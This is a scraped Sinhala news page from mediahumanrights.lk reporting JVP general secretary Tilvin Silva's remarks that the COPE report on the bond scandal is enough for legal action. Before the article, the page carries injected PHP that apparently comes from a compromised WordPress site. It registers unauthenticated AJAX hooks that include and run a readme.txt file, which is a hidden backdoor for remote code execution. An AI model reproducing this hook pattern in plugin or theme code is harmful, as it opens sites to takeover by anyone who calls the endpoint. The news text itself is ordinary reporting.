if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } බැඳුම්කරය ගැන නිතීමය ක්‍රියාමාර්ග ගන්න කෝප් වාර්තාව ප්‍රමාණවත් - mediahumanrights.lk
mediahumanrights.lk
News Political

බැඳුම්කරය ගැන නිතීමය ක්‍රියාමාර්ග ගන්න කෝප් වාර්තාව ප්‍රමාණවත්

බැඳුම්කර ගනුදෙනුව සම්බන්ධයෙන් කරුණු රැසක් කෝප් වාර්තාව තුළින් අනාවරණය වු බවත්, එහිදී නීතිමය ක්‍රියාමාර්ග ගැනීමට කෝප් වාර්තාවේ කරුණු ප්‍රමාණවත් වන බවත් ජනතා විමුක්ති පෙරමුණ පවසයි.
අද(25) පැවති මාධ්‍ය හමුවකට එක් වෙමින් එහි ප්‍රධාන ලේකම් ටිල්වින් සිල්වා මහතා මෙම අදහස් පළ කළේය.
බැඳුම්කර කොමිසමේ පරීක්‍ෂණවල ඉදිරිය කුමක් වේවිදැයි පැවසිය නොහැකි බවත්, ජනතා විමුක්ති පෙරමුණ මුල සිට බැඳුම්කර ගනුදෙනුවෙන් වංචාවක් සිදුවූ බවත් ඊට අගමැතිවරයා වගකිව යුතු බවත් ප‍්‍රකාශ කළ බව ද ටිල්විල් සිල්වා මහතා පවසයි.
හඳුන්නෙත්ති මහතා සභාපතිත්වය දරන කෝප් කමිටුවේ වාර්තාව සකස් කිරීමේදී එය අවුල් කිරීමට එජාප මන්තී‍්‍රවරුන් උත්සාහ කළ බවත්, කෙසේ වෙතත් කෝප් වාර්තාවෙන් මෙම ගනුදෙනුව පිළිබඳව කරුණු රැසක් අනාවරණය වු බවද සිල්වා මහතා වැඩිදුරටත් කියා සිටියේය.
ජනාධිපති කොමිසමටත් වැරදිකරුවන්ට දඬුවම් දීමට නීතිමය බලයක් නොමැති අතර නීතිමය පියවර ගත යුත්තේ ආණ්ඩුව බවද ඔහු පැවසීය.
මෙහිදී වැඩිදුරටත් අදහස් දැක්වු ටිල්වින් සිල්වා මහතා මෙසේ ද පැවසීය.
“ජනාධිපති කොමිසමේදීත් සාකච්ඡාවට ලක් කෙරෙන්නේ කෝප් කමිටුවේදී විමර්ශනයට ලක් කෙරුණු කරුණුයි.
එනිසා නීතිමය පියවර ගන්නවා නම් කෝප් වාර්තාව ප‍්‍රමාණවත්.  කෙසේ නමුත් ජනාධිපති කොමිසමේ කාලය දීර්ඝ කරන්නේ විමර්ශනවලට නම් එහි ගැටලූවක් නැහැ. නමුත් නීතිමය කි‍්‍රයාමාර්ගක් නොගෙන දිගින් දිගටම කල් ගන්නවාට අපි විරුද්ධයි.
ඒ වගේම අගමැතිවරයා කොමිසමට ගෙන්විය යුතු බවට අපි දිගින් දිගටම කිව්වා. කොමිසමේ වාර්තාවට මොකද වෙන්නේ කියලා අපිට කියන්න බැහැ. නමුත් මේ වනවිටත් රවී කරුණානායකට එරෙහිව නීතිමය පියවර ගන්න පුළුවන්.
ඔහු නිවසක් අල්ලස් වශයෙන් ලබාගෙන තිබෙනවා. ඒ වගේම රාජ්‍ය බැංකු නිලධාරීන්ට ගනුදෙනුවට වාසි වන විදිහට කි‍්‍රයා කරන්න නියෝග ලබාදී තිබෙනවා.
ව්‍යවස්ථාව සම්බන්ධයෙන් ඇතිවී තිබෙන ප‍්‍රශ්නයට අමතරව රටේ ජනතාවට විශාල ප‍්‍රශ්න රැසකට මුහුණ දෙන්න සිදුවෙලා තිබෙනවා. කළු සල්ලි හම්බකරන සුළු පිරිසට අමතරව අද සාමාන්‍ය ජනතාවට ජීවත් වෙන්න අමාරු තත්වයක් උදාවෙලා තිබෙනවා.
ජාතික සමගිය, නැතිවෙලා. රටේ අපරාධ වැඩිවෙලා. කෙසේ නමුත් රටේ පවතින ව්‍යවස්ථාව නරක නම් රටේ ජනතාවගේ ප‍්‍රජාතන්ත‍්‍රවාදය රැුකෙන සියලූම ජන කොටස්වල අයිතිවාසිකම් ආරක්‍ෂා වන රටට වාසි ව්‍යවස්ථාවක් සකස්කළ යුතුයි.
නමුත් එවැනි ආකාරයක ව්‍යවස්ථාවක් හැදෙයි කියලා අපි හිතන්නේ නැහැ. නමුත් විධායක ජනාධිපති ධුරය අහෝසි කරන අලූත් මැතිවරණ ක‍්‍රමයක් සහිත ජනතාවගේ අයිතිවාසිකම් ආරක්‍ෂා වන ව්‍යවස්ථාවක් රටට අවශ්‍යයි. නමුත් අද වනවිට ව්‍යවස්ථාවක් හෝ කෙටුම්පතක් නැති තත්වයක් තුළ විශාල සංවාදයක් ඇතිවෙලා තිබෙනවා.
හෙට රට බෙදයි කියලා එක කණ්ඩායකමක් කෑ ගහනවා. මේ සංවාදය හදලා තිබෙන්නේ පරාජයට පත්වූ බංකොළොත් දේශපාලන කණ්ඩායමක් විසින්. කෙටුම්පතක් සකස් කළාට පසුව ඒ ගැන සංවාද කරන්න පුළුවන්. නමුත් දැන් අලූත් ව්‍යවස්ථාවක් හදන්න සියලූම දෙනාට යෝජනා ඉදිරිපත් කරන්න පුළුවන්කම තිබෙනවා. ජනතාවට තිබෙන ඇත්ත ප‍්‍රශ්න යට ගහන්න මෙම ව්‍යවස්ථා මාතෘකාව උඩට අරගෙන තිබෙනවා. ආණ්ඩුවටත් මේ සංවාදය වාසිදායක වෙලා. “

(under the courtesy of adaderana.lk news web)

Related posts

මහින්දගේ කතාවෙන් පස්සේ පාර්ලිමේන්තුවේ දැඩි උණුසුම් තත්ත්වයක් – අදත් ඡන්දයක් ඉල්ලයි

Shiran Viraj

මමත් සිංහරාජය කපල, හිටවල දෙන්නම් – විදුර වික්‍රමනායක

Shiran Viraj

ජනපතිගේ රැකියා ලක්‍ෂයට තරුණ තරුණියන් පොරකති..

Shiran Viraj